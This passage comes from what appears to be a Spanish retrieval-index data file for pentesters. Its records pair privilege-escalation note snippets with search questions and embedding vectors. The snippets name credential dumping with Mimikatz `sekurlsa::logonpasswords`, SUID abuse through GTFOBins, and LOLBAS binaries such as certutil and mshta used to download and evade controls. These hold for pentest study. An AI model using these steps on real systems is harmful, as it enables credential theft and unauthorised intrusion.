-0.10431, 0.10179, 0.01067, 0.13812, 0.02427, 0.04721, -0.10007, 0.05487, -0.0765, -0.02847, -0.04667, 0.01502, 0.00218, -0.02422, 0.03782, -0.18087, -0.18802, -0.02739, 0.04385, -0.09482, 0.12736, -0.10869, -0.07138, -0.15832, -0.11173, -0.03057, -0.01885, -0.03709, -0.06479, -0.10575, -0.0037, -0.02706, -0.0714, 0.05123, -0.0737, 0.03789, 0.13458, 0.01164, -0.00817, -0.09321, 0.05491, -0.00582, 0.07277, -0.03351, 0.09986, -0.05373, -0.01033, -0.05003, -0.0733, -0.05791, -0.02359, -0.11098, 0.05329, 0.02933, 0.04266, 0.12901, -0.04129, -0.03873, -0.02578, -0.00996, 0.05042, -0.05222, -0.03215, -0.04201, 0.12934, -0.01513, -0.07948, 0.10501, 0.04472, 0.06142, 0.02704, -0.01447, -0.02506, 0.0142, 0.07939, -0.03015, -0.02523, -0.00641, -0.05082, 0.1061, -0.06849, 0.02463, -0.01538, -0.03063, 0.01912, -0.08113, 0.049, -0.01223, -0.007, -0.0149, -0.08114, -0.01121, -0.02833, -0.20163, -0.0049, -0.00877, -0.05343, 0.06665, 0.04302, 0.01076, 0.0851, -0.07594, -0.05612, -0.04997, 0.03669, 0.00437, -0.09505, -0.08549, -0.00164, -0.02448, 0.04157, -0.04584, 0.02133, -0.0883, 0.02804, -0.0284, 0.01176, 0.02552, -0.04316, 0.01832, -0.05229, 0.02857, -0.09889, 0.04384, -0.08501, -0.09895, 0.05003, 0.03579, 0.01688, -0.02486, 0.04597, -0.00853, 0.03603, 0.0887, 0.02855, -0.01005, 0.03992, -0.03058, 0.00348, 0.0117, 0.00146, 0.00544, -0.02251, -0.06561, -0.00794, -0.06319, -0.00995, 0.03015, -0.01523, 0.02994, 0.04072, -0.00029, -0.03991, 0.02237, 0.02065, 0.02629, -0.02967, -0.01031, 0.02378, 0.02433, 0.04365, -0.04783, 0.03253, -0.01022, -0.03508, 0.00113, 0.02504, -0.02291, 0.00192, 0.067, 0.00276, -0.05917, 0.00308, 0.0218, -0.00473, 0.01218, 0.0003, -0.03212, -0.04906, 0.00984, -0.01873, 0.02381, -0.04999, -0.06654, -0.02643, 0.01884, 0.02479, -0.01143, -0.00794, 0.03702, 0.0071, 0.02073, 0.00937, 0.01117, 0.0352, -0.0138, -0.02366, 0.00964, -0.00202, -0.06511, 0.0385, 0.02933, -0.02706, -0.03168, -0.0741, -0.00535, 0.01507, -0.02511, -0.065, -0.03193, -0.00723, 0.02016, -0.01089, -0.04067, -0.00769, -0.00879, 0.044, 0.00069, 0.00374, 0.01963]} +{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Tras conseguir SYSTEM\n- Mimikatz β†’ `sekurlsa::logonpasswords` β†’ hashes/creds de dominio.\n- Esas creds β†’ Movimiento lateral y Active Directory.\n\nRelacionado: Potato attacks Β· Exploits conocidos Β· PEASS-ng Β· Privesc Linux Β· OSCP MOC", "indexar": "con que puedo hacer un movimiento lateral en Active Directory con las credenciales capturadas?", "v": [-0.08578, 0.07407, -0.1541, -0.17174, -0.12098, 0.00541, -0.05148, 0.20025, -0.05329, 0.01659, 0.03104, -0.08624, -0.09168, -0.04875, 0.07455, 0.04151, 0.08083, 0.02608, -0.06004, -0.0994, -0.05992, -0.02327, -0.02295, -0.06328, 0.18464, 0.02028, -0.01137, 0.05059, -0.00723, -0.07617, -0.06011, 0.10122, 0.03562, 0.03741, 0.07087, -0.10476, -0.12751, 0.06408, 0.0585, 0.06578, -0.16509, 0.0552, -0.14548, -0.01723, 0.02041, 0.07329, -0.01586, -0.04992, -0.10227, 0.0293, 0.02078, -0.01189, -0.07603, -0.13011, -0.04735, 0.01565, 0.04683, -0.06454, -0.0357, -0.1411, 0.01256, 0.04366, -0.01568, -0.00438, -0.04875, -0.10377, 0.07694, -0.10993, -0.068, -0.00606, 0.08229, 0.0283, -0.03038, 0.1676, -0.0189, 0.01967, 0.03493, -0.04968, -0.0932, 0.09529, 0.01169, -0.01988, -0.00284, 0.01073, 0.00165, -0.10317, -0.04425, -0.12481, -0.004, -0.01438, 0.12509, 0.1005, -0.08619, 0.04397, -0.0351, 0.10698, -0.10673, 0.05774, -0.04721, -0.015, 0.01847, -0.04143, -0.0754, 0.04912, 0.04565, -0.02359, 0.01052, 0.10031, -0.07695, 0.06908, -0.01249, 0.02234, -0.02603, 0.00404, 0.01671, 0.11041, -0.15023, -0.08634, 0.01275, 0.07304, 0.04999, -0.13134, -0.00923, -0.12585, 0.00317, 0.03034, -0.09292, 0.04244, -0.04693, -0.00318, 0.03453, 0.04177, 0.00092, -0.08324, -0.02003, -0.06225, 0.07386, 0.08585, 0.03721, -0.076, -0.02518, -0.06942, 0.03389, -0.02489, 0.02262, 0.04087, 0.06984, 0.04038, -0.02766, 0.025, 0.02763, 0.04473, 0.00568, -0.036, 0.05451, 0.11825, 0.02399, -0.01796, -0.07044, 0.00294, 0.0134, 0.06023, -0.03947, -0.03197, -0.0294, -0.07881, -0.05732, -0.01924, 0.00059, 0.04664, -0.02375, 0.01432, -0.02881, -0.07917, 0.06723, 0.03536, 0.02298, -0.01525, 0.0812, -0.06476, 0.00204, 0.08651, 0.01733, -0.00768, 0.07531, 0.01179, 0.02721, 0.00095, -0.01274, 0.06557, 0.02649, 0.01606, 0.00244, -0.03947, -0.02863, -0.07769, 0.02607, 0.06066, 0.04397, -0.00022, -0.03095, -0.01593, 0.06812, -0.00195, 0.02901, 0.02751, -0.05553, 0.10576, 0.09325, -0.01596, -0.06402, -0.01241, 0.14623, 0.00768, -0.08946, 0.02097, 0.00062, 0.01546, -0.06021, 0.0356, 0.01479, 0.02505, 0.02531, 0.07952, 0.02049, -0.02573, 0.00683, 0.00842, -0.02418, 0.01893, 0.02457, 0.02738, -0.00273, -0.03183, 0.01001, 0.0378, 0.04939, -0.01921, -0.06269, 0.01292, -0.00265, -0.00859, -0.03563, 0.03203, -0.03198, 0.00723, -0.02175, 0.05728, 0.04599, -0.05291, 0.02339, -0.00108, 0.02856, -0.04819, 0.02116, 0.03788]} +{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Tras conseguir SYSTEM\n- Mimikatz β†’ `sekurlsa::logonpasswords` β†’ hashes/creds de dominio.\n- Esas creds β†’ Movimiento lateral y Active Directory.\n\nRelacionado: Potato attacks Β· Exploits conocidos Β· PEASS-ng Β· Privesc Linux Β· OSCP MOC", "indexar": "existe alguna alternativa a Mimikatz para obtener contraseΓ±as de sistema?", "v": [-0.04993, 0.16192, -0.11374, -0.06599, -0.04061, -0.06872, -0.1594, -0.08546, -0.29632, -0.05002, 0.00637, -0.07355, 0.0558, 0.02937, 0.20872, -0.06116, 0.11949, -0.0242, 0.10677, -0.03856, 0.00311, -0.07388, -0.06411, 0.00039, -0.06713, -0.01623, 0.0343, -0.05851, -0.08331, 0.00099, 0.05688, -0.01034, 0.0194, 0.0365, -0.09771, 0.09742, 0.107, 0.05324, 0.11621, -0.0522, 0.1264, 0.02878, -0.03995, 0.13306, -0.00713, -0.0266, -0.03822, 0.02391, 0.12604, -0.03607, -0.13229, -0.03705, -0.11406, -0.06955, 0.02835, -0.11941, 0.04797, -0.00412, -0.10743, 0.03034, -0.06895, -0.02257, 0.03919, 0.04285, 0.01488, -0.00086, -0.03516, -0.02672, -0.12547, 0.17372, 0.04455, -0.02622, 0.02402, -0.05503, -0.02545, 0.02315, 0.05739, -0.04299, 0.00464, 0.11477, -0.08474, 0.02502, 0.00305, 0.04554, -0.04693, -0.04405, 0.00725, -0.04913, 0.00419, -0.03355, -0.0159, 0.00273, 0.04451, 0.08705, -0.05354, -0.05361, -0.0725, 0.0002, -0.15607, 0.00688, -0.05555, 0.0687, -0.07974, 0.09556, -0.0505, -0.07519, 0.01697, -0.00889, 0.04755, -0.07971, 0.0016, 0.03829, -0.03861, -0.04029, -0.03606, -0.04572, -0.01281, -0.01327, -0.00627, -0.01047, -0.02503, 0.03621, -0.003, -0.08778, 0.06245, 0.01939, 0.00266, 0.02037, -0.04479, -0.02473, 0.07293, -0.08912, -0.00606, -0.05013, -0.01595, -0.01724, 0.08489, -0.03594, -0.05305, -0.00689, -0.04693, -0.03974, 0.0016, -0.06323, 0.0556, 0.03479, 0.03182, -0.02686, 0.02293, -0.07373, -0.15768, 0.02025, -0.00063, 0.01397, -0.0261, 0.05463, 0.00321, -0.04045, -0.07357, 0.07981, 0.05752, -0.09772, -0.05456, 0.03488, -0.11158, 0.01106, 0.04469, 0.00763, -0.00673, 0.03301, 0.03732, 0.1112, 0.05715, -0.04192, 0.03149, -0.01188, -0.04452, -0.09394, 0.03838, -0.04394, 0.02616, 0.03464, -0.00883, 0.00122, 0.05336, -0.02781, 0.0555, 0.11307, -0.05228, -0.02703, 0.0733, -0.04785, -0.04552, 0.02306, -0.02892, 0.02367, 0.02633, -0.10701, -0.01977, -0.04031, -0.0355, 0.03853, 0.0181, -0.08909, 0.03136, 0.01274, -0.01128, -0.04482, 0.03348, 0.01007, 0.08537, 0.04817, 0.0324, -0.00922, -0.05769, -0.02015, -0.06563, 0.02765, 0.0141, -0.0942, -0.01638, -0.01187, 6e-05, 0.14945, 0.01694, -0.00892, -0.04641, 0.0491, -0.00621, -0.02812, 0.02223, -0.06942, 0.04848, 0.06294, 0.03661, -0.05958, -0.09214, -0.04006, 0.0011, -0.00286, 0.01092, 0.02514, 0.07713, -0.03055, -0.02297, -0.00509, -0.05504, -0.01179, -0.01891, -0.03534, -0.02195, 0.02125, -0.00485, 0.03351, 0.05969, -0.0096]} +{"tipo": "pregunta", "herramienta": "GTFOBins y LOLBAS", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/GTFOBins y LOLBAS.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## GTFOBins (Linux) β€” https://gtfobins.github.io\n- Dado un binario con SUID, `sudo`, o capability β†’ cΓ³mo abusarlo para shell/leer/escribir como root.\n- Flujo: `sudo -l` o `find / -perm -4000` β†’ buscas el binario en GTFOBins.\n- Ejemplo mental: `vim`, `find`, `less`, `python` con SUID β†’ root trivial.", "indexar": "que programa sirve para encontrar y explotar errores de seguridad en binarios con permisos especiales?", "v": [0.18293, 0.03421, -0.12231, -0.16065, 0.00927, -0.13696, -0.10474, -0.13326, -0.08479, -0.13651, 0.03531, -0.03806, 0.06147, -0.08021, 0.06032, -0.0728, -0.06045, -0.01007, 0.06776, -0.01924, 0.0944, 0.01842, 0.01564, -0.00502, -0.02362, 0.02746, -0.12331, -0.03579, -0.19315, 0.04415, 0.01356, 0.04452, 0.14413, -0.07513, -0.02614, 0.0579, 0.03682, 0.04381, -0.03067, 0.01874, 0.10749, 0.01007, -0.0824, 0.05805, 0.05347, -0.04382, -0.02255, 0.04967, -0.0151, -0.05492, 0.02218, -0.03288, -0.03989, -0.13155, 0.10215, -0.08342, 0.09448, -0.13217, -0.13322, 0.01173, -0.05981, -0.04801, 0.09574, -0.04811, -0.00732, 8e-05, 0.09113, 0.10963, -0.12079, 0.0695, -0.06399, 0.08602, 0.09153, 0.15652, 0.00938, -0.06802, -0.06205, 0.01463, 0.08391, 0.0008, 0.02975, 0.04666, -0.03265, 0.02872, -0.05788, -0.05694, 0.03487, 0.00027, -0.05797, 0.00833, 0.08647, 0.08846, -0.01043, 0.02655, 0.04724, -0.11757, 0.0917, 0.03454, -0.03006, 0.11282, 0.09232, -0.04293, -0.04166, 0.12924, -0.06478, 0.13906, 0.02594, 0.02521, -0.007, -0.04098, -0.04245, 0.00817, 0.02245, -0.04765, -0.01232, 0.00192, -0.06443, -0.07107, 0.02152, -0.01054, -0.08778, -0.04604, -0.02021, 0.01364, 0.07395, -0.05811, -0.02564, 0.1727, -0.01176, 0.03354, 0.02553, -0.0116, -0.02286, 0.02217, -0.04703, 0.04287, 0.05563, -0.05584, -0.09724, -0.01454, 0.04939, 0.03622, 0.02425, 0.00517, 0.0003, 0.13502, 0.02987, -0.04318, 0.019, -0.04691, -0.00483, 0.02582, 0.02882, 0.03056, -0.08802, -0.01571, -0.04733, -0.07006, 0.01421, 0.07595, 0.01326, 0.01995, -0.02834, 0.01531, 0.07786, 0.00501, -0.03837, -0.0225, 0.04978, -0.01309, -0.0388, 0.04727, 0.10497, -0.12493, 0.0063, -0.04506, -0.04796, -0.06472, -0.00703, -0.03297, -0.10098, -0.0671, 0.02455, 0.04654, 0.05689, -0.02209, 0.01982, -0.01751, 0.04285, 0.00684, 0.00991, 0.00501, -0.0639, -0.0143, -0.04993, 0.0025, 0.0417, -0.0125, -0.01986, -0.06621, 0.01786, 0.06764, -0.0169, -0.02237, 0.10863, 0.04106, -0.0144, -0.0117, 0.02964, 0.02275, -0.02665, -0.07703, 0.08296, -0.08606, -0.1181, -0.01225, 0.04404, 0.08704, -0.00368, 0.02504, 0.03342, -0.01418, 0.01216, 0.06712, 0.00019, -0.04532, 0.02878, -0.01135, 0.02389, 0.07733, -0.0056, 0.01721, -0.08656, -0.02771, 0.04735, -0.01396, 0.01916, 0.01958, -0.02631, -0.09392, 0.01371, 0.0639, 0.00919, -0.06399, -0.02851, -0.0028, -0.05919, 0.00919, 0.03411, -0.01935, -0.03928, 0.04679, 0.01727, -0.06178, 0.01815, -0.05965]} +{"tipo": "pregunta", "herramienta": "GTFOBins y LOLBAS", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/GTFOBins y LOLBAS.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## GTFOBins (Linux) β€” https://gtfobins.github.io\n- Dado un binario con SUID, `sudo`, o capability β†’ cΓ³mo abusarlo para shell/leer/escribir como root.\n- Flujo: `sudo -l` o `find / -perm -4000` β†’ buscas el binario en GTFOBins.\n- Ejemplo mental: `vim`, `find`, `less`, `python` con SUID β†’ root trivial.", "indexar": "con que herramienta puedo analizar quΓ© vulnerabilidades existen al ejecutar un archivo ejecutable con SUID?", "v": [0.04008, 0.05726, -0.14703, -0.06293, 0.09051, -0.04502, -0.02855, -0.02582, -0.10758, -0.05283, -0.10197, -0.0556, -0.01341, -0.01341, 0.06582, 0.03973, 0.08046, -0.15942, 0.01433, -0.00171, 0.08113, -0.00889, -0.03859, -0.03721, -0.11443, 0.055, -0.00135, 0.12043, -0.10025, -0.08104, -0.09242, 0.09578, 0.09833, -0.07599, -0.01789, 0.1077, -0.07011, 0.09425, -0.11261, 0.12299, -0.00835, 0.12233, -0.16139, 0.0256, 0.00269, -0.03157, -0.07109, 0.0137, 0.0315, 0.09584, 0.01424, -0.06187, -0.20466, -0.07595, 0.04615, -0.11122, 0.13549, -0.19768, 0.09241, -0.01825, -0.11824, 0.04547, 0.07915, -0.0266, 0.06207, -0.01733, -0.01366, -0.02346, -0.04386, 0.12315, -0.06815, 0.06181, -0.03916, 0.06189, -0.02471, -0.03313, -0.03326, 0.03188, -0.01964, 0.05724, 0.0173, -0.04945, -0.06453, 0.06848, -0.14146, -0.08505, -0.03538, -0.05756, 0.04184, -0.0674, 0.11471, -0.00184, -0.00841, 0.03171, 0.04376, -0.02573, 0.12677, -0.04569, -0.02556, -0.01929, 0.05527, -0.02894, -0.07092, 0.06802, 0.06897, 0.10745, -0.06647, 0.04859, -0.01573, -0.08827, -0.01059, -0.00342, 0.02217, -0.05387, -0.05844, -0.01396, -0.08745, -0.07173, 0.04611, -0.09974, -0.04642, 0.03211, -0.07072, -0.02577, -0.02761, -0.06173, -0.03515, 0.06905, -0.02425, -0.05066, -0.021, -0.00269, -0.03883, -0.02608, -0.04344, 0.0534, 0.06532, -0.14587, -0.03148, -0.10984, 0.12969, -0.01295, -0.00134, 0.00352, 0.07223, 0.04036, -0.0255, -0.05104, -0.08883, 0.01791, 0.10078, -0.05219, -0.05058, 0.03819, -0.04609, 0.00203, -0.03118, -0.04805, -0.06359, 0.05169, 0.02953, 0.03383, -0.03634, 0.00927, 0.01095, -0.05229, 0.03105, 0.02501, 0.07165, 0.0333, 0.03321, 0.02003, 0.03027, -0.06456, 0.05485, -0.13274, -0.05308, -0.05387, 0.05082, -0.07561, -0.03276, -0.05303, -0.01186, 0.01401, -0.01138, -0.02717, 0.02989, -0.01634, -0.01395, 0.08941, -0.00131, 0.03586, -0.0035, -0.00371, 0.05951, 0.01042, 0.00582, -0.00636, -0.02984, -0.00813, -0.07169, -0.03811, -0.01437, -0.02224, 0.04095, 0.07983, -0.06904, 0.02489, -0.06674, 0.04415, 0.00437, 0.00746, 0.07189, -0.07317, -0.03681, -0.02052, 0.02167, 0.05034, 0.01855, 0.00834, -0.03411, 0.04048, 0.15645, -0.02149, 0.00943, 0.02487, -0.0213, 0.00852, 0.00919, -0.01299, -0.00479, 0.04526, -0.02546, -0.00794, 0.0435, -0.02767, 0.01775, -0.03171, -0.04462, -0.03966, 0.02945, 0.06916, -0.03668, -0.06138, -0.00298, -0.0507, -0.03905, 0.00534, -0.01608, -0.08539, -0.03248, 0.04589, 0.05697, -0.05355, 0.03655, -0.06797]} +{"tipo": "pregunta", "herramienta": "GTFOBins y LOLBAS", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/GTFOBins y LOLBAS.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## GTFOBins (Linux) β€” https://gtfobins.github.io\n- Dado un binario con SUID, `sudo`, o capability β†’ cΓ³mo abusarlo para shell/leer/escribir como root.\n- Flujo: `sudo -l` o `find / -perm -4000` β†’ buscas el binario en GTFOBins.\n- Ejemplo mental: `vim`, `find`, `less`, `python` con SUID β†’ root trivial.", "indexar": "cual es una guia o recurso para descubrir como ejecutar programas con privilegios root mediante sus caracterΓ­sticas de permisos?", "v": [0.07043, -0.01297, -0.14615, -0.16036, 0.19377, -0.04643, 0.07377, -0.0644, -0.08458, -0.15743, -0.01069, 0.03255, 0.05412, -0.03433, 0.05461, -0.06129, 0.09589, 0.06487, -0.04844, 0.03134, 0.00808, -0.1069, -0.0358, 0.01373, -0.06388, 0.0157, 0.16202, -0.00508, -0.02677, -0.02913, 0.039, 0.07394, 0.05187, -0.20083, -0.13292, 0.02459, 0.05249, 0.08106, -0.07637, 0.02674, -0.02039, -0.0286, -0.11443, 0.13249, -0.00609, -0.15245, -0.09498, 0.03106, -0.03257, -0.12982, 0.04793, -0.0292, -0.11487, -0.0715, 0.07124, -0.02411, 0.07365, -0.07572, -0.09114, 0.03984, -0.0504, -0.02966, 0.04774, -0.01304, 0.0465, -0.05538, 0.04229, 0.01305, -0.02021, 0.03951, -0.03303, 0.05028, 0.05327, 0.05037, 0.02099, -0.00589, -0.0792, 0.00872, 0.14156, 0.00541, 0.04403, 0.08157, -0.14243, -0.04276, -0.05723, -0.03134, 0.02617, -0.05508, 0.02315, -0.07123, 0.02239, 0.063, -0.03272, 0.0574, 0.02566, -0.05594, 0.07818, 0.10604, -0.01016, 0.12801, 0.11305, -0.04576, -0.04654, 0.21571, 0.04516, 0.02541, 0.03332, -0.06835, -0.06732, 0.03956, -0.07433, 0.07655, 0.02098, 0.02912, -0.02439, -0.01548, -0.11158, -0.13435, 0.00455, -0.09629, -0.09662, -0.04978, -0.0646, 0.00612, 0.07642, -0.07239, -0.03944, 0.11901, 0.02437, 0.02657, 0.00452, -0.03622, 0.06183, 0.01077, -0.05769, 0.04216, 0.0473, -0.0086, -0.07272, -0.11602, 0.03357, -0.04536, 0.05021, 0.03122, 0.07772, 0.01102, -0.04671, -0.01497, -0.08016, -0.03787, -0.01783, -0.01621, -0.00545, 0.09945, -0.07825, -0.00355, -0.03234, -0.02727, -0.01742, 0.09131, 0.03392, -0.0391, -0.11345, 0.03353, 0.06641, -0.02018, -0.05497, -0.03123, 0.02879, 0.02646, -0.04396, 0.04388, 0.00986, -0.03973, 0.00771, -0.03719, -0.00555, -0.03661, 0.01852, 0.0431, -0.04802, 0.04111, 0.02421, -0.00482, -0.05548, -0.03427, -0.03385, 0.00721, 0.02799, 0.03126, -0.03387, 0.07947, 0.00691, -0.03808, 0.01396, -0.00589, -0.02999, -0.00194, -0.02799, -0.00158, -0.01334, 0.00063, -0.04019, -0.04296, 0.06808, -0.0221, 0.00369, 0.01839, -0.04562, 0.08895, 0.02104, -0.03776, 0.09404, 0.03032, -0.0629, 0.01144, -0.01323, -0.00506, 0.01349, -9e-05, 0.00743, 0.01835, 0.14182, 0.04676, 0.06025, -0.07735, 0.04848, -0.0331, 0.01594, 0.03451, 0.00223, 0.00795, -0.00034, -0.0291, 0.0446, 0.03969, 0.01782, -0.03478, 0.01039, -0.0368, 0.02921, 0.0826, 0.01188, -0.04316, 0.00333, -0.00569, -0.10431, -0.0177, -0.02563, -0.04779, 0.05923, 0.06008, 0.05572, -0.03079, 0.01773, -0.05461]} +{"tipo": "pregunta", "herramienta": "GTFOBins y LOLBAS", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/GTFOBins y LOLBAS.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## LOLBAS (Windows) β€” https://lolbas-project.github.io\n- \"Living Off the Land Binaries\": binarios firmados de Windows para descargar/ejecutar/bypassear.\n- Útil para Transferencia de ficheros y evadir controles (`certutil`, `bitsadmin`, `mshta`...).", "indexar": "que programa sirve para ejecutar binarios oficiales de windows sin instalar nada?", "v": [0.12646, 0.03988, -0.14979, -0.06833, 0.1094, -0.15436, -0.08167, -0.19089, -0.10775, -0.09843, 0.01482, -0.11393, 0.01385, -0.08774, 0.0039, -0.0199, 0.00721, -0.13326, 0.10802, -0.0186, -0.02687, 0.041, 0.05773, 0.01911, -0.00386, 0.08223, -0.08074, -0.02428, -0.17687, -0.02633, 0.0638, 0.03649, 0.13409, -0.11009, 0.05388, 0.03342, -0.07526, -0.01006, 0.00934, 0.12602, 0.0714, 0.07749, -0.02791, 0.14406, 0.01736, -0.04245, 0.05903, -0.02121, 0.00993, -0.07423, 0.04179, 0.05327, -0.00301, -0.05372, 0.05206, -0.15458, 0.10969, -0.13662, -0.06448, 0.00302, -0.00637, 0.08747, 0.03573, 0.02146, 0.03764, 0.02114, 0.02818, 0.06657, 0.00699, 0.05037, -0.10482, 0.05543, 0.05969, 0.06861, -0.05077, 0.02223, -0.08763, -0.04087, 0.12103, -0.00287, 0.09113, -0.00095, 0.01009, 0.05783, -0.02199, -0.09399, -0.03627, -0.00989, -0.00532, -0.07431, 0.04513, 0.03571, -0.0932, 0.11107, 0.12685, -0.09661, 0.06319, 0.02028, 0.03379, 0.10277, 0.07106, -0.10146, -0.0212, 0.08152, -0.04341, 0.10013, 0.03868, -0.04682, -0.03792, 0.00202, 0.04532, 0.03221, -0.04018, -0.0582, -0.00484, -0.01835, -0.04615, -0.03525, 0.00087, 0.03316, -0.17486, 0.0479, -0.06313, 0.03707, 0.02954, -0.11001, 0.00134, 0.04595, -0.02271, 0.15351, 0.05329, -0.04053, 0.01373, -0.02604, -0.13836, 0.02322, 0.03255, -0.10727, -0.0362, -0.08362, 0.09789, 0.11343, -0.01651, -0.02652, 0.02003, 0.04918, 0.02229, -0.01197, 0.04831, 0.01193, 0.09619, 0.0286, -0.01759, 0.10175, -0.07792, -0.05598, 0.07545, 0.00019, 0.0167, 0.01321, -0.01674, 0.01215, -0.06256, -0.04443, 0.03137, -0.00023, -0.06301, -0.00125, 0.0942, 0.04424, 0.0035, 0.06201, 0.0074, -0.05547, 0.0161, -0.04962, -0.0321, -0.00745, 0.03661, 0.01937, -0.10755, 0.03887, 0.07797, 0.02597, -0.03893, 0.00853, -0.06297, -0.01726, -0.03059, -0.01224, -0.00152, -0.02715, -0.04508, -0.07026, 0.04287, 0.02104, -0.01175, -0.05633, 0.0033, -0.05631, -0.03701, 0.03577, -0.00299, -0.02113, 0.10228, 0.07206, -0.04769, 0.00951, 0.02434, 0.10629, -0.04993, -0.02991, -0.00321, -0.03352, -0.01877, -0.04722, 0.05604, 0.02469, 0.06606, 0.02888, -0.00706, -0.01025, 0.03543, 0.04846, 0.01163, -0.07888, -0.02386, 0.03433, -0.01151, 0.00478, -0.06769, -0.00197, 0.00262, 0.0082, 0.04671, -0.00788, -0.01732, -0.01443, -0.00862, -0.0561, -0.0093, 0.06563, 0.0134, -0.06297, -0.04717, 0.00674, -0.04538, -0.03538, 0.02585, -0.03797, -0.03077, 0.04658, 0.04708, -0.03054, -0.01625, 0.03793]} +{"tipo": "pregunta", "herramienta": "GTFOBins y LOLBAS", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/GTFOBins y LOLBAS.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## LOLBAS (Windows) β€” https://lolbas-project.github.io\n- \"Living Off the Land Binaries\": binarios firmados de Windows para descargar/ejecutar/bypassear.\n- Útil para Transferencia de ficheros y evadir controles (`certutil`, `bitsadmin`, `mshta`...).", "indexar": "con que puedo transferir archivos usando herramientas ya instaladas en windows?", "v": [0.15384, 0.08389, -0.16283, -0.19639, 0.0326, -0.07443, -0.06538, -0.07068, -0.06113, -0.09168, -0.14921, -0.13578, -0.04579, 0.00095, -0.03899, 0.027, 0.08207, -0.10094, 0.08167, -0.05563, -0.02859, 0.03928, -0.09633, -0.09312, -0.07656, 0.02847, -0.04388, -0.0005, -0.22647, 0.02104, -0.00999, 0.01322, 0.12067, 0.00956, -0.03084, -0.08177, -0.05293, 0.1157, 0.07948, 0.05067, 0.08775, 0.11598, -0.06102, 0.13614, 0.08627, -0.11577, 0.017, -0.09552, 0.02564, -0.02179, -0.02688, -0.12217, -0.14163, -0.00792, 0.0123, -0.14348, 0.14885, -0.05498, 0.03332, 0.08721, -0.08467, 0.11487, -0.07959, 0.15502, -0.00818, 0.0297, -0.02007, -0.04914, -0.0756, 0.1728, 0.02514, 0.07179, 0.02525, 0.03481, -0.06117, 0.01878, -0.02386, -0.04491, 0.02113, -0.05607, 0.04897, 0.02489, 0.00158, -0.07802, 0.04285, -0.12154, -0.04056, -0.01052, 0.05684, -0.07784, 0.02973, -0.06527, 0.01028, 0.0293, 0.11408, -0.02656, -0.02505, 0.01285, 0.0083, -0.04243, 0.04618, 0.01467, 0.01066, 0.12023, -0.0404, 0.05438, 0.00392, -0.07587, 0.00237, -0.05109, 0.0678, 0.10295, 0.01736, 0.04028, -0.0108, 0.07636, -0.01679, -0.10001, -0.05996, 0.00505, -0.01614, 0.05671, -0.02846, 0.05958, -0.00068, -0.08969, -0.03987, 0.08148, -0.10715, 0.05861, 0.05201, -0.02619, -0.07012, -0.04781, -0.10547, 0.00148, 0.02791, -0.05219, -0.01327, -0.08729, 0.0529, 0.09183, 0.02215, -0.02285, 0.02354, 0.09581, -0.02367, 0.0164, -0.03757, -0.10579, 0.05386, -0.05102, 0.01589, 0.06674, -0.03549, 0.04461, 0.02684, -0.00706, -0.07206, -0.02548, -0.07237, 0.01682, -0.03373, 0.00758, -0.0295, -0.04468, 0.04741, 0.08461, 0.05476, -0.00094, 0.03539, 0.06861, 0.01174, 0.01863, -0.00193, 0.02234, -0.01392, -0.03814, -0.01027, -0.04585, -0.03216, 0.04177, -0.01403, 0.0235, 0.03386, 0.01936, -0.00503, 0.04354, -0.04278, 0.05765, -0.07284, 0.00265, 0.01073, -0.06207, 0.02893, 0.01654, -0.06835, -0.01261, -0.01683, 0.00692, -0.01269, 0.03552, -0.01628, -0.06636, 0.07133, 0.04075, -0.09057, 0.00861, 0.01611, 0.0205, -0.03113, 0.01024, 0.05548, -0.05844, 0.00438, -0.02339, -0.02952, 0.00449, -0.0153, 0.00475, 0.03776, 0.00075, 0.02766, -0.01042, 0.00441, 0.04308, -0.09139, -0.03176, -0.03725, 0.00439, -0.02517, 0.05538, 0.02525, -0.00474, 0.0329, -0.04224, -0.04222, -0.04398, -0.03443, 0.04791, -0.05453, 0.02358, 0.00672, 0.02146, -0.09647, 0.02121, -0.06631, -0.04226, 0.02174, -0.06174, 0.04225, 0.04251, 2e-05, -0.02242, -0.00674, 0.00658]} +{"tipo": "pregunta", "herramienta": "GTFOBins y LOLBAS", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/GTFOBins y LOLBAS.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## LOLBAS (Windows) β€” https://lolbas-project.github.io\n- \"Living Off the Land Binaries\": binarios firmados de Windows para descargar/ejecutar/bypassear.\n- Útil para Transferencia de ficheros y evadir controles (`certutil`, `bitsadmin`, `mshta`...).", "indexar": "cual es una alternativa libre a utilidades como certutil o bitsadmin?", "v": [0.04579, 0.078, -0.09387, 0.00469, 0.07209, -0.08585, -0.12302, -0.06795, -0.17404, -0.02883, -0.09551, -0.16708, -0.07759, 0.15411, 0.07763, -0.15385, 0.04306, -0.16189, 0.11097, -0.06172, 0.00792, -0.02437, -0.03447, 0.01759, -0.08731, 0.0645, 0.12687, 0.06292, -0.0794, 0.14278, 0.09355, 0.02928, 0.09874, -0.07007, -0.01496, 0.03926, 0.10372, 0.09607, -0.0168, 0.0788, 0.02956, -0.03923, -0.06732, 0.15652, 0.03951, -0.07915, -0.07938, 0.06032, 0.03188, -0.00266, -0.05791, -0.03108, -0.09336, 0.01802, 0.09282, -0.02065, 0.05803, -0.17636, -0.0432, -0.07749, -0.14853, 0.05452, 0.05267, 4e-05, -0.0473, -0.0055, -0.01832, 0.08791, -0.09535, 0.08092, 0.07064, 0.09969, 0.03227, -0.02037, -0.08439, 0.04039, -0.04061, -0.05563, -0.00693, 0.04039, 0.03267, -0.0382, 0.00333, 0.01645, -0.03536, -0.07237, 0.10339, -0.09819, -0.03089, 0.01038, 0.10212, 0.01533, -0.01619, 0.04671, 0.00024, -0.04577, 